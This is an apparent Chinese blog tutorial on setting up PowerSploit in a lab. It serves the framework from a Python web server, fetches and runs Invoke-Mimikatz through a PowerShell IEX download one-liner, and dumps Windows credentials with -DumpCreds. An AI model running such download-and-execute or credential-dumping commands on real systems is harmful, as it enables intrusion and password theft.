前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >利用python搭建Powersploit

利用python搭建Powersploit

作者头像
py3study
发布2020-01-23 20:42:45
6830
发布2020-01-23 20:42:45
举报
文章被收录于专栏:python3

powershell脚本站点的搭建

一、Powersploit

Powersploit是一款基于powershell的后渗透(Post-Exploitation)框架,集成大量渗透相关模块和功能。

下载powersploit

github地址: https://github.com/mattifestation/PowerSploit

二、搭建站点(这里用python自带的web服务,也可以用phpstudy等搭建站点)

1.实验环境:

服务端:win7(python3.7)

客户端:Windows server 2008

客户端有python环境(用python的web服务),确保客户端能连通服务端

2.实验步骤:

服务端:(win7)

1.把下载好的powersploit,解压

2.安装python,cd到PowerSploit-master目录里面,并开启web服务

  python -m http.server 80    #python3.7

3.本地测试python的web服务是否开启

客户端:(windows server2008)

客户端测试:

可以看到通过客户端的浏览器访问到搭建的站点了

下面开始进行powersploit内网渗透神器其中的Invoke-Mimikatz.ps1脚本文件进行举例

在客户端加载服务端脚本并执行(IEX远程下载脚本执行)

powershell加载iex(New-Object Net.WebClient).DownloadString('http://192.168.10.4/Exfiltration/Invoke-Mimikatz.ps1”)

 执行: Invoke-Mimikatz -DumpCreds

       效果图如下:

  从上图可以看到已经获取到本机(windows server2008 的用户名和密码) 

Tips:还有一种可以直接把脚本文件下载下来的方式

$client=new-object System.Net.WebClient

$client.DownloadFile(‘http://192.168.8.135/Exfiltration/Invoke-Mimikatz.ps1’,’C://Mimikatz.ps1’)

也可以直接运行脚本文件来进行内网攻击,但这种方式并不推荐,因为系统出于安全考虑

powershell默认是不能执行本机上的.ps1文件的,这是因为ps有默认的安全限制

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019/05/14 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档